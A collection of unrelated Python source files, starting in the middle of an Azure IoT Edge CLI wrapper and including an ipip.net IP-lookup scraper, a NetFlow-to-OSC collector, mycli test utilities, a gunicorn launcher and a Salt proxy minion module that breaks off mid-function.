self._handle_monitor_event_process(process) finally: if timer: timer.cancel() if stderr_data and b"invalid_grant" in stderr_data: self.output.error(self.decode(stderr_data)) self.output.info( "Your Azure CLI session has expired. Please re-run `iotedgedev iothub setup` to refresh your credentials.") self.logout() sys.exit() if stdout_io and stdout_data != "": stdout_io.writelines(self.decode(stdout_data)) if stderr_io and stderr_data != "": stderr_io.writelines(self.decode(stderr_data)) if process.returncode != 0: if error_message: self.output.error(error_message) self.output.line() return False if not stdout_io and not stderr_io: self.output.line() except Exception as e: if error_message: self.output.error(error_message) self.output.error(str(e)) self.output.line() return False return True def _enqueue_stream(self, stream, queue): try: while not self._proc_terminated: queue.put(stream.readline().decode('utf8').rstrip()) finally: stream.close() def _handle_monitor_event_process(self, process, error_message=None): stdout_queue = Queue() stderr_queue = Queue() stream_thread_map = { 'stdout': Thread(target=self._enqueue_stream, args=(process.stdout, stdout_queue), daemon=True), 'stderr': Thread(target=self._enqueue_stream, args=(process.stderr, stderr_queue), daemon=True) } stream_thread_map['stdout'].start() stream_thread_map['stderr'].start() try: while not self._proc_terminated: if not process.poll(): try: self.output.echo(stdout_queue.get_nowait()) except Empty: pass else: err = None try: err = stderr_queue.get_nowait() except Empty: pass # Avoid empty sys.excepthook errors from underlying future # There is already a uAMQP issue in work for this # https://github.com/Azure/azure-uamqp-python/issues/30 if err and "sys.excepthook" not in err: err = err.lstrip() err = err.lstrip('ERROR:') if error_message: err = "{}: {}".format(error_message, err) self.output.error(err) return False except KeyboardInterrupt: self.output.info('Terminating process...') self._terminate_process_tree() return True def _terminate_process_tree(self, msg=None): try: if self.process: if self.is_posix(): os.killpg(os.getpgid(self.process.pid), signal.SIGTERM) else: self.process.send_signal(signal.CTRL_BREAK_EVENT) self.process.kill() self._proc_terminated = True if msg: self.output.info(msg) self.output.line() return True except Exception: return False def invoke_az_cli(self, args, error_message=None, stdout_io=None): try: exit_code = self.az_cli.invoke(args, out_file=stdout_io) if exit_code and exit_code != 0: if error_message: self.output.error(error_message) return False except Exception as e: if error_message: self.output.error(error_message) self.output.error(str(e)) return False self.output.line() return True def add_extension(self, name): return self.invoke_az_cli_outproc(["extension", "add", "--name", name, "--yes"], f("Error while adding extension {name}."), suppress_output=True) def extension_exists(self, name): return self.invoke_az_cli_outproc(["extension", "show", "--name", name, "--output", "table"], f("Error while checking for extension {name}."), suppress_output=True) def user_has_logged_in(self): self.output.header("AUTHENTICATION") self.output.status(f("Retrieving Azure CLI credentials from cache...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc( ["account", "show"], stdout_io=io) if result: try: self.output.prompt("Azure CLI credentials found.") out_string = io.getvalue() data = json.loads(out_string) return data["id"] except Exception: pass self.output.prompt( "Azure CLI credentials not found. Please follow instructions below to login to the Azure CLI.") return None def login_account(self, username, password): return self.invoke_az_cli_outproc(["login", "-u", username, "-p", password], "Error while trying to login to Azure. Make sure your account credentials are correct", suppress_output=True) def login_sp(self, username, password, tenant): return self.invoke_az_cli_outproc(["login", "--service-principal", "-u", username, "-p", password, "--tenant", tenant], "Error while trying to login to Azure. Make sure your service principal credentials are correct.", suppress_output=True) def login_interactive(self): return self.invoke_az_cli_outproc(["login"], "Error while trying to login to Azure.", suppress_output=True) def logout(self): return self.invoke_az_cli_outproc(["account", "clear"]) def list_subscriptions(self): self.output.status("Retrieving Azure Subscriptions...") return self.invoke_az_cli_outproc(["account", "list", "--all", "--query", "[].{\"Subscription Name\":name, Id:id}", "--out", "table"], "Error while trying to list Azure subscriptions.") def get_default_subscription(self): with output_io_cls() as io: result = self.invoke_az_cli_outproc(["account", "show"], "Error while trying to get the default Azure subscription id.", io) if result: out_string = io.getvalue() data = json.loads(out_string) return data["id"] return '' def get_subscription_id_starts_with(self, token): with output_io_cls() as io: query = get_query_argument_for_id_and_name(token) result = self.invoke_az_cli_outproc(["account", "list", "--query", query], "Could not find a subscription for which the id starts with or name contains '{0}'".format(token), io) if result: out_string = io.getvalue() if out_string: data = json.loads(out_string) if len(data) == 1: return data[0]["id"] elif len(data) > 1: self.output.error( "Found multiple subscriptions for which the ids start with or names contain '{0}'. Please enter more characters to further refine your selection.".format(token)) return token else: self.output.error("Could not find a subscription for which the id starts with or name contains '{0}'.".format(token)) return '' def set_subscription(self, subscription): if len(subscription) < 36: subscription = self.get_subscription_id_starts_with(subscription) if len(subscription) < 36: return subscription if len(subscription) == 36: self.output.status(f("Setting Subscription to '{subscription}'...")) result = self.invoke_az_cli_outproc(["account", "set", "--subscription", subscription], "Error while trying to set Azure subscription.") if result: return subscription return None def resource_group_exists(self, name): self.output.status(f("Checking if Resource Group '{name}' exists...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["group", "exists", "-n", name], f("Resource Group {name} does not exist."), io) if result: out_string = io.getvalue() if out_string == "true": return True self.output.prompt(f("Resource Group {name} does not exist.")) return False def get_resource_group_location(self, name): self.output.status(f("Retrieving Resource Group '{name}' location...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["group", "show", "-n", name, "--query", "location", "--output", "tsv"], f("Could not retrieve Resource Group {name}'s location."), io) if result: return io.getvalue() else: return '' def create_resource_group(self, name, location): self.output.status( f("Creating Resource Group '{name}' at '{location}'...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["group", "create", "--name", name, "--location", location], f("Could not create the new Resource Group {name} at location:{location}."), io) return result def list_resource_groups(self): self.output.header("RESOURCE GROUP") self.output.status("Retrieving Resource Groups...") with output_io_cls() as io: result = self.invoke_az_cli_outproc(["group", "list", "--query", "[].{\"Resource Group\":name, Location:location}", "--out", "table"], "Could not list the Resource Groups.", stdout_io=io) self.output.prompt(io.getvalue()) self.output.line() return result def set_modules(self, device_id, connection_string, config): self.output.status(f("Deploying '{config}' to '{device_id}'...")) config = os.path.join(os.getcwd(), config) if not os.path.exists(config): raise FileNotFoundError('Deployment manifest file "{0}" not found. Please run `iotedgedev build` first'.format(config)) telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix}) return self.invoke_az_cli_outproc(["iot", "edge", "set-modules", "-d", device_id, "-n", connection_string.iothub_host.hub_name, "-k", config, "-l", connection_string.connection_string], error_message=f("Failed to deploy '{config}' to '{device_id}'..."), suppress_output=True) def monitor_events(self, device_id, connection_string, hub_name, timeout=300): return self.invoke_az_cli_outproc(["iot", "hub", "monitor-events", "-d", device_id, "-n", hub_name, "-l", connection_string, '-t', str(timeout), '-y'], error_message=f("Failed to start monitoring events."), suppress_output=False, timeout=timeout) def get_free_iothub(self): with output_io_cls() as io: result = self.invoke_az_cli_outproc(["iot", "hub", "list"], f("Could not list IoT Hubs in subscription."), stdout_io=io) if result: out_string = io.getvalue() data = json.loads(out_string) for iot in data: if iot["sku"]["name"] == "F1": return (iot["name"], iot["resourceGroup"]) return (None, None) def get_first_iothub(self, resource_group): with output_io_cls() as io: result = self.invoke_az_cli_outproc( ["iot", "hub", "list", "--resource-group", resource_group, "--query", "[0]"], f("Could not get first IoT Hub."), io) if result: out_string = io.getvalue() if out_string: data = json.loads(out_string) return data["name"] return '' def list_iot_hubs(self, resource_group): self.output.header("IOT HUB") self.output.status(f("Retrieving IoT Hubs in '{resource_group}'...")) return self.invoke_az_cli_outproc(["iot", "hub", "list", "--resource-group", resource_group, "--query", "[].{\"IoT Hub\":name}", "--out", "table"], f("Could not list the IoT Hubs in {resource_group}.")) def iothub_exists(self, value, resource_group): self.output.status( f("Checking if '{value}' IoT Hub exists...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["iot", "hub", "show", "--name", value, "--resource-group", resource_group, "--out", "table"], stderr_io=io) if not result: self.output.prompt( f("Could not locate the {value} in {resource_group}.")) return result def create_iothub(self, value, resource_group, sku): self.output.status( f("Creating '{value}' in '{resource_group}' with '{sku}' sku...")) with output_io_cls() as io: with output_io_cls() as error_io: self.output.prompt( "Creating IoT Hub. Please wait as this could take a few minutes to complete...") result = self.invoke_az_cli_outproc(["iot", "hub", "create", "--name", value, "--resource-group", resource_group, "--sku", sku, "--query", "[].{\"IoT Hub\":name}", "--out", "table"], f("Could not create the IoT Hub {value} in {resource_group} with sku {sku}."), stdout_io=io, stderr_io=error_io) if not result and error_io.getvalue(): self.output.error(error_io.getvalue()) self.output.line() elif io.getvalue(): self.output.prompt(io.getvalue()) self.output.line() return result def get_iothub_connection_string(self, value, resource_group): self.output.status( f("Retrieving '{value}' connection string...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["iot", "hub", "show-connection-string", "--hub-name", value, "--resource-group", resource_group], f("Could not create the IoT Hub {value} in {resource_group}."), stdout_io=io) if result: out_string = io.getvalue() data = json.loads(out_string) return data["cs"] return '' def edge_device_exists(self, value, iothub, resource_group): self.output.status( f("Checking if '{value}' device exists in '{iothub}'...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show", "--device-id", value, "--hub-name", iothub, "--resource-group", resource_group, "--out", "table"], stderr_io=io) if not result: self.output.prompt( f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}.")) return result def list_edge_devices(self, iothub): self.output.header("EDGE DEVICE") self.output.status( f("Retrieving edge devices in '{iothub}'...")) return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "list", "--hub-name", iothub, "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"], f("Could not list the edge devices in {iothub} IoT Hub.")) def create_edge_device(self, value, iothub, resource_group): self.output.status( f("Creating '{value}' edge device in '{iothub}'...")) return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "create", "--device-id", value, "--hub-name", iothub, "--resource-group", resource_group, "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"], f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}.")) def get_device_connection_string(self, value, iothub, resource_group): self.output.status( f("Retrieving '{value}' connection string...")) with output_io_cls() as io: result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show-connection-string", "--device-id", value, "--hub-name", iothub, "--resource-group", resource_group], f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."), stdout_io=io) if result: out_string = io.getvalue() data = json.loads(out_string) return data["cs"] return ''
ipip.py
#!/usr/bin/python3 """        /. . . . ./. . . . . . . . . . . . /. . . . . . . . . .\       . . . . . . . . . . . . . . . . . . . . /. . . │. . . . . . \       .′. . . ./ . . . . . . . . . . . . . . |. . . . .| . . . . . . . . . .       . . . . / . . . . . . . . . . . . . . . |. . . . .|. . . . |. . . . . .|      i . . . .| . . . . . . . . ./ . . . / |. . . . .|. . . . |. . . . .l |      | . . . .| . . . . . . . ./\ /   |. . . . .|、 . . |. . .│|ノ      |. ./. . .| . . . . . . ./. ./\_,、八 . . . . | Х. .|. . .│|      ∨. ./.i|. . . . . . /l ,.斗午斥   \. .斗-ミV|. . .│|       ∧. .|l.人|i | . |/ く rJ}}¦    ヽ_j丁}V. ./.∧| .    |. .j ̄\八| . |     乂_ツ      ヒツ 〈/./      .     乂. .__,ノ| {_\ト- ¦           ,   iト |/     ⌒〈`j⌒Y>r‐ヘ.   し           八         >‐く_,ノ厶}:.丶     (`フ    /          厂 ̄\           ,. イ         />、.    \   /≧=(\        //  \     \/|   |\\ """ __author__ = "Kiri Kira" __licence__ = "GPL" __email__ = "kiri_so@outlook.com" __status__ = "production" import requests import argparse import pickle import os from bs4 import Tag, BeautifulSoup as soup from prettytable import PrettyTable from threading import Timer, Thread from time import sleep from selenium import webdriver from selenium.webdriver.common.keys import Keys HEADERS = { 'origin': "http://ipip.net", 'upgrade-insecure-requests': "1", 'content-type': "application/x-www-form-urlencoded", 'user-agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36", 'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", 'referer': "http://ipip.net/ip.html", 'accept-encoding': "gzip, deflate", 'accept-language': "zh-CN,zh;q=0.9,en;q=0.8,zh-HK;q=0.7,zh-TW;q=0.6", 'cache-control': "no-cache" } PATH_COOKIE = "/tmp/" class Extractor(object): '''The extractor for parsing HTML tables into python lists.''' def __init__(self, table): if isinstance(table, Tag): self.table = table elif isinstance(table, soup): self.table = table.find_all("table") elif isinstance(table, str): self.table = soup(str, 'html.parser').find_all("table") else: raise Exception('unrecognized type') self.output = [] def parse(self): current_row = 0 for row in self.table.find_all("tr"): for cell in row.children: if cell.name in ["th", "td"]: body = cell.text self.insert_cell(current_row, body) current_row += 1 return self.output def insert_cell(self, row_number, body): if len(self.output) <= row_number: self.output.append([]) self.output[row_number].append(body) class Rainbow(object): """This class is used to print rainbow-like progress animation.""" def __init__(self, text): self.text = text self.times = 0 self.colors = list( map(lambda num: "\033[" + str(num) + "m", range(31, 38))) self.thread = Thread(target=self.cycle) self._running = False def cprint(self): colored_str = "" new_colors = self.colors[self.times % 7:] + self.colors[:self.times % 7] for i in range(len(self.text)): colored_str += new_colors[i % 7] + self.text[i] print(colored_str, end="\r") self.times += 1 def cycle(self): while self._running: self.cprint() sleep(0.1) def start_shining(self): self._running = True self.thread.start() def stop_shining(self): self._running = False print("", end="") def request_ip(url, ip_addr, en=False): data = [('ip', ip_addr), ] if en: response = requests.post(url, headers=HEADERS, data=data) return find_table(response.text) cookies = load_cookie() if cookies: response = requests.post(url, headers=HEADERS, data=data, cookies=cookies) if response.status_code == 200: return find_table(response.text) return find_table(selenium_ip(url, ip_addr)) def find_table(source): sp = soup(source, 'html.parser') tables = sp.find_all("table") return tables def create_driver(): option = webdriver.ChromeOptions() option.add_argument("--headless") option.add_argument("--host-resolver-rules=MAP www.google-analytics.com 127.0.0.1") option.add_argument('user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36') return webdriver.Chrome(options=option) def selenium_ip(url, ip_addr): driver = create_driver() driver.implicitly_wait(10) driver.set_page_load_timeout(10) driver.get(url) ele = driver.find_element_by_xpath("/html/body/div[2]/form/input") if ip_addr: ele.clear() ele.send_keys(ip_addr) ele.send_keys(Keys.ENTER) save_cookie(driver) return driver.page_source def save_cookie(driver): pickle.dump(driver.get_cookies(), open(PATH_COOKIE + "cookies.pkl", "wb")) def load_cookie(): cookies = pickle.load(open(PATH_COOKIE + "cookies.pkl", "rb"))\ if os.path.exists(PATH_COOKIE + "cookies.pkl") else None if cookies: cookie_set = dict() for cookie in cookies: cookie_set[cookie['name']] = cookie['value'] else: return None return cookie_set def create_table(rows): tables = [] for row in rows: pt = PrettyTable(row[0]) for item in row[1:]: pt.add_row(item) tables.append(pt) return tables def domain_ip_parser(ip_or_domain_or_url, local_dns, ipv6): """parsing the arg to get the hostname to query.""" #ip_or_domain_or_url = str(sys.argv[1]) if ip_or_domain_or_url.startswith("https://") or ip_or_domain_or_url.startswith("http://"): ip_or_domain = ip_or_domain_or_url.split('/')[2] elif ip_or_domain_or_url == ".": ip_or_domain = "" else: ip_or_domain = ip_or_domain_or_url if local_dns: import socket ip_or_domain = socket.gethostbyname(ip_or_domain) elif ipv6: import socket ip_or_domain = socket.getaddrinfo(ip_or_domain, None, socket.AF_INET6)[0][-1][0] return ip_or_domain def main(): parser = argparse.ArgumentParser( description="A script that helps you to get information via https://ipip.net") parser.add_argument('ip_or_domain_or_url', type=str, help="Input the hostname or the url specifices the hostname you want to query. Pass nothing or a dot(.) to query where you are.", default='.', nargs='?') parser.add_argument('-l', "--local", action='store_true', dest="local_dns", help="query host in local, and default is on IPIP's server") parser.add_argument('-w', "--webbrowser", action='store_true', dest="browser", help="open https://ipip.net in webbrowser") parser.add_argument('-e', "--english", action='store_true', dest="en", help="use en.ipip.net as source. Since Chinese version will challenge visiter now, use -e may make it faster.") parser.add_argument('-6', action="store_true", dest="ipv6", help="query for ipv6 address") tables = [] args = parser.parse_args() if args.browser: import webbrowser webbrowser.open("https://www.ipip.net/ip.html") return if args.en: URL = "https://en.ipip.net/ip.html" else: URL = "https://www.ipip.net/ip.html" rb = Rainbow("已经在努力查询啦") rb.start_shining() ip_or_domain = domain_ip_parser( args.ip_or_domain_or_url, args.local_dns, args.ipv6) html_tables = request_ip(URL, ip_or_domain) for html_table in html_tables: if str(html_table.th.string) == "网络安全风控基础数据" \ or (html_table.a and str(html_table.a.string)) == "RTBAsia非人类访问量甄别服务": continue tables.append(Extractor(html_table).parse()) printable_tables = create_table(tables) rb.stop_shining() for table in printable_tables: print(table) if __name__ == "__main__": main()
netflow_2_osc.py
#!/usr/bin/env python3 import threading import time import argparse import socketserver from collector_v9 import ExportPacket import client_multi_traffic as cmt ''' A handler for netflow data collector. Handles the collected netflow data and passes it to the Aggregator ''' class Handler(socketserver.BaseRequestHandler): TEMPLATES = {} @classmethod def set_server_handler(cls, data_handler, host, port): cls.data_handler = data_handler data_handler.start_thread() server = socketserver.UDPServer((host, port), cls) return server def handle(self): data = self.request[0] host = self.client_address[0] exported_packet = ExportPacket(data, self.TEMPLATES) self.TEMPLATES.update(exported_packet.templates) self.data_handler.inc() current_time = time.time() self.data_handler.check_second_passed(current_time) self.data_handler.add_val(current_time, [flow.data for flow in exported_packet.flows]) self.data_handler.print_index() ''' Aggregates netflow data on a 1 sec basis and passes the aggregated data to the OSC exporter ''' class Aggregator: def __init__(self, exporter): self.index = 0 self.exist = {} self.complete = [] self.second_passed = threading.Semaphore(0) self.prev_time = 0 self.traffic_types = {'1': 'icmp', '6': 'tcp', '17': 'udp'} self.traffic_measures = {"_pps": "IN_PKTS", "_bw": "IN_BYTES"} self.exporter = exporter def start_thread(self): t = threading.Thread(target=self.wait_print) t.setDaemon(True) t.start() ''' Summerizes flows and passes them to the OSC exporter ''' def summerize_flows(self, flows): by_proto = {} for flow in flows: for j in flow: proto_name = self.traffic_types[str(j["PROTOCOL"])] for aspect, measurement in self.traffic_measures.items(): by_proto[proto_name + aspect] = int(j[measurement]) if str(proto_name + aspect) not in by_proto else \ by_proto[proto_name + aspect] + int(j[measurement]) self.exporter.update_traffic(by_proto) def inc(self): self.index += 1 def print_index(self): print(self.index) def get_index(self): return self.index def add_val(self, time_added, flows): self.prev_time = int(time_added) self.exist[time_added] = flows def print_exist(self): print(self.exist) ''' Checks if a second has passed between received netflow data If a second had passed - a semaphore is upped ''' def check_second_passed(self, current_time): if self.prev_time != 0 and self.prev_time < int(current_time): self.complete.append(self.prev_time) self.second_passed.release() ''' Waits for enough data to be collected, then aggregates it. ''' def wait_print(self): while (True): self.second_passed.acquire() try: if not self.exist or not self.complete: raise KeyError current = self.complete.pop(0) aggregate = [] to_erase = [] for flow in self.exist: if int(flow) == current: aggregate.append(self.exist[flow]) to_erase.append(flow) self.summerize_flows(aggregate) for flow in to_erase: del self.exist[flow] except KeyError: pass ''' A server that listens on an interface for netflow data ''' def server_loop(server): try: print("Waiting for traffic") server.serve_forever(poll_interval=args.poll) except (IOError, SystemExit): raise except KeyboardInterrupt: raise if __name__ == "__main__": parsed = argparse.ArgumentParser(description='A netflow collector that sends flow to sonic-pi via OSC') parsed.add_argument('--port', '-P', type=int, help='Port address for collector') parsed.add_argument('--host', '-H', type=str, help='IP address for collector') parsed.add_argument('--poll', '-I', type=int, default=0.5, help='Poll interval') parsed.add_argument('--sonicpihost', '-S', type=str, default='172.16.3.27', help='IP address to send flows to over OSC') parsed.add_argument('--sonicpiport', '-R', type=int, default=4559, help='Port address to send flows to over OSC') parsed.add_argument('--graphics', '-G', type=bool, default=False, help='Display graphics <True|False>') args = parsed.parse_args() # Set up exporter that sends aggregated netflow to sonic pi via OSC exporter = cmt.FlowToOsc(args.sonicpihost, args.sonicpiport) # A handler that takes care of netflow data flowing into the collector data_handler = Aggregator(exporter) print("Creating server on host: {}, port: {}".format(args.host, args.port)) server = Handler.set_server_handler(data_handler, args.host, args.port) # Start a thread that listens on an interface for netflow data t = threading.Thread(target=server_loop, args=(server,)) t.start() ''' Runs the exporter that gets the aggregated netflow data and sends it to sonic pi via OSC Also runs the GUI that draws the netflow data charts. Needs to run from the main thread. ''' try: exporter.run(args.graphics) except (IOError, SystemExit): raise except KeyboardInterrupt: raise
threaded_iterator.py
import queue import threading from typing import Any, NamedTuple class ThreadedIterator(object): """An iterator that computes its elements in a parallel thread to be ready to be consumed. Exceptions raised by the threaded iterator are propagated to consumer. """ def __init__( self, iterator, max_queue_size: int = 2, start: bool = True, ): self._queue = queue.Queue(maxsize=max_queue_size) self._thread = threading.Thread(target=lambda: self.worker(iterator)) if start: self.Start() def Start(self): self._thread.start() def worker(self, iterator): try: for element in iterator: self._queue.put(self._ValueOrError(value=element), block=True) except Exception as e: # Propagate an error in the iterator. self._queue.put(self._ValueOrError(error=e)) # Mark that the iterator is done. self._queue.put(self._EndOfIterator(), block=True) def __iter__(self): next_element = self._queue.get(block=True) while not isinstance(next_element, self._EndOfIterator): value = next_element.GetOrRaise() yield value next_element = self._queue.get(block=True) self._thread.join() class _EndOfIterator(object): """Tombstone marker object for iterators.""" pass class _ValueOrError(NamedTuple): """A tuple which represents the union of either a value or an error.""" value: Any = None error: Exception = None def GetOrRaise(self) -> Any: """Return the value or raise the exception.""" if self.error is None: return self.value else: raise self.error
utils.py
import os import time import signal import platform import multiprocessing import pymysql import pytest from mycli.main import special PASSWORD = os.getenv('PYTEST_PASSWORD') USER = os.getenv('PYTEST_USER', 'root') HOST = os.getenv('PYTEST_HOST', 'localhost') PORT = int(os.getenv('PYTEST_PORT', 3306)) CHARSET = os.getenv('PYTEST_CHARSET', 'utf8') SSH_USER = os.getenv('PYTEST_SSH_USER', None) SSH_HOST = os.getenv('PYTEST_SSH_HOST', None) SSH_PORT = os.getenv('PYTEST_SSH_PORT', 22) def db_connection(dbname=None): conn = pymysql.connect(user=USER, host=HOST, port=PORT, database=dbname, password=PASSWORD, charset=CHARSET, local_infile=False) conn.autocommit = True return conn try: db_connection() CAN_CONNECT_TO_DB = True except: CAN_CONNECT_TO_DB = False dbtest = pytest.mark.skipif( not CAN_CONNECT_TO_DB, reason="Need a mysql instance at localhost accessible by user 'root'") def create_db(dbname): with db_connection().cursor() as cur: try: cur.execute('''DROP DATABASE IF EXISTS _test_db''') cur.execute('''CREATE DATABASE _test_db''') except: pass def run(executor, sql, rows_as_list=True): """Return string output for the sql to be run.""" result = [] for title, rows, headers, status in executor.run(sql): rows = list(rows) if (rows_as_list and rows) else rows result.append({'title': title, 'rows': rows, 'headers': headers, 'status': status}) return result def set_expanded_output(is_expanded): """Pass-through for the tests.""" return special.set_expanded_output(is_expanded) def is_expanded_output(): """Pass-through for the tests.""" return special.is_expanded_output() def send_ctrl_c_to_pid(pid, wait_seconds): """Sends a Ctrl-C like signal to the given `pid` after `wait_seconds` seconds.""" time.sleep(wait_seconds) system_name = platform.system() if system_name == "Windows": os.kill(pid, signal.CTRL_C_EVENT) else: os.kill(pid, signal.SIGINT) def send_ctrl_c(wait_seconds): """Create a process that sends a Ctrl-C like signal to the current process after `wait_seconds` seconds. Returns the `multiprocessing.Process` created. """ ctrl_c_process = multiprocessing.Process( target=send_ctrl_c_to_pid, args=(os.getpid(), wait_seconds) ) ctrl_c_process.start() return ctrl_c_process
main.py
import argparse import threading import time import webbrowser from gunicorn.app.base import BaseApplication from keepsake_ui.app import setup_app class Application(BaseApplication): def __init__(self, app, options=None): self.options = options or {} self.application = app super().__init__() def load_config(self): config = { key: value for key, value in self.options.items() if key in self.cfg.settings and value is not None } for key, value in config.items(): self.cfg.set(key.lower(), value) def load(self): return self.application def init(self, parser, opts, args): pass def parse_args(): parser = argparse.ArgumentParser() default_bind = "0.0.0.0:8080" parser.add_argument( "-b", "--bind", type=str, help=f"Address port bind (default {default_bind})", default=default_bind, ) parser.add_argument( "--no-browser", action="store_true", help="If set do not open browser" ) parser.add_argument("-r", "--repository", type=str, help="Keepsake repository") return parser.parse_args() def open_browser(bind): time.sleep(1) webbrowser.open(bind) def main(): args = parse_args() options = { "bind": args.bind, "workers": 1, } if not args.no_browser: threading.Thread(target=open_browser, args=(args.bind,), daemon=True).start() Application(setup_app(args.repository), options).run() if __name__ == "__main__": main()
proxy.py
# -*- coding: utf-8 -*- # # Proxy minion metaproxy modules # from __future__ import absolute_import, print_function, with_statement, unicode_literals import os import signal import sys import types import logging import threading import traceback # Import Salt Libs # pylint: disable=3rd-party-module-not-gated import salt import salt.client import salt.crypt import salt.loader import salt.beacons import salt.engines import salt.payload import salt.pillar import salt.syspaths import salt.utils.args import salt.utils.context import salt.utils.data import salt.utils.error import salt.utils.event import salt.utils.files import salt.utils.jid import salt.utils.minion import salt.utils.minions import salt.utils.network import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.user import salt.utils.zeromq import salt.defaults.exitcodes import salt.cli.daemons import salt.log.setup import salt.serializers.msgpack import salt.minion import salt.defaults.exitcodes import salt.utils.dictupdate from salt.utils.event import tagify from salt.exceptions import ( CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltSystemExit, ) from salt.ext import six from salt.ext.six.moves import range from salt.minion import ProxyMinion from salt.defaults import DEFAULT_TARGET_DELIM from salt.utils.process import (default_signals, SignalHandlingProcess) import tornado.gen # pylint: disable=F0401 import tornado.ioloop # pylint: disable=F0401 log = logging.getLogger(__name__) def post_master_init(self, master): log.debug("subclassed LazyLoaded _post_master_init") if self.connected: self.opts['master'] = master self.opts['pillar'] = yield salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], saltenv=self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts: errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \ 'Check your pillar/opts configuration and contents. Salt-proxy aborted.' log.error(errmsg) self._running = False raise SaltSystemExit(code=-1, msg=errmsg) if 'proxy' not in self.opts: self.opts['proxy'] = self.opts['pillar']['proxy'] if self.opts.get('proxy_merge_pillar_in_opts'): # Override proxy opts with pillar data when the user required. self.opts = salt.utils.dictupdate.merge(self.opts, self.opts['pillar'], strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'), merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False)) elif self.opts.get('proxy_mines_pillar'): # Even when not required, some details such as mine configuration # should be merged anyway whenever possible. if 'mine_interval' in self.opts['pillar']: self.opts['mine_interval'] = self.opts['pillar']['mine_interval'] if 'mine_functions' in self.opts['pillar']: general_proxy_mines = self.opts.get('mine_functions', []) specific_proxy_mines = self.opts['pillar']['mine_functions'] try: self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines except TypeError as terr: log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format( self.opts['id'])) fq_proxyname = self.opts['proxy']['proxytype'] # Need to load the modules so they get all the dunder variables self.functions, self.returners, self.function_errors, self.executors = self._load_modules() # we can then sync any proxymodules down from the master # we do a sync_all here in case proxy code was installed by # SPM or was manually placed in /srv/salt/_modules etc. self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv']) # Pull in the utils self.utils = salt.loader.utils(self.opts) # Then load the proxy module self.proxy = salt.loader.proxy(self.opts, utils=self.utils) # And re-load the modules so the __proxy__ variable gets injected self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.functions.pack['__proxy__'] = self.proxy self.proxy.pack['__salt__'] = self.functions self.proxy.pack['__ret__'] = self.returners self.proxy.pack['__pillar__'] = self.opts['pillar'] # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__ self.utils = salt.loader.utils(self.opts, proxy=self.proxy) self.proxy.pack['__utils__'] = self.utils # Reload all modules so all dunder variables are injected self.proxy.reload_modules() # Start engines here instead of in the Minion superclass __init__ # This is because we need to inject the __proxy__ variable but # it is not setup until now. self.io_loop.spawn_callback(salt.engines.start_engines, self.opts, self.process_manager, proxy=self.proxy) if ('{0}.init'.format(fq_proxyname) not in self.proxy or '{0}.shutdown'.format(fq_proxyname) not in self.proxy): errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \ 'Check your proxymodule. Salt-proxy aborted.' log.error(errmsg) self._running = False raise SaltSystemExit(code=-1, msg=errmsg) self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])() proxy_init_fn = self.proxy[fq_proxyname + '.init'] proxy_init_fn(self.opts) self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy) self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matchers = salt.loader.matchers(self.opts) self.beacons = salt.beacons.Beacon(self.opts, self.functions) uid = salt.utils.user.get_uid(user=self.opts.get('user', None)) self.proc_dir = salt.minion.get_proc_dir(self.opts['cachedir'], uid=uid) if self.connected and self.opts['pillar']: # The pillar has changed due to the connection to the master. # Reload the functions so that they can use the new pillar data. self.functions, self.returners, self.function_errors, self.executors = self._load_modules() if hasattr(self, 'schedule'): self.schedule.functions = self.functions self.schedule.returners = self.returners if not hasattr(self, 'schedule'): self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners, cleanup=[salt.minion.master_event(type='alive')], proxy=self.proxy) # add default scheduling jobs to the minions scheduler if self.opts['mine_enabled'] and 'mine.update' in self.functions: self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': self.opts['mine_interval'], 'jid_include': True, 'maxrunning': 2, 'run_on_start': True, 'return_job': self.opts.get('mine_return_job', False) } }, persist=True) log.info('Added mine.update to scheduler') else: self.schedule.delete_job('__mine_interval', persist=True) # add master_alive job if enabled if (self.opts['transport'] != 'tcp' and self.opts['master_alive_interval'] > 0): self.schedule.add_job({ salt.minion.master_event(type='alive', master=self.opts['master']): { 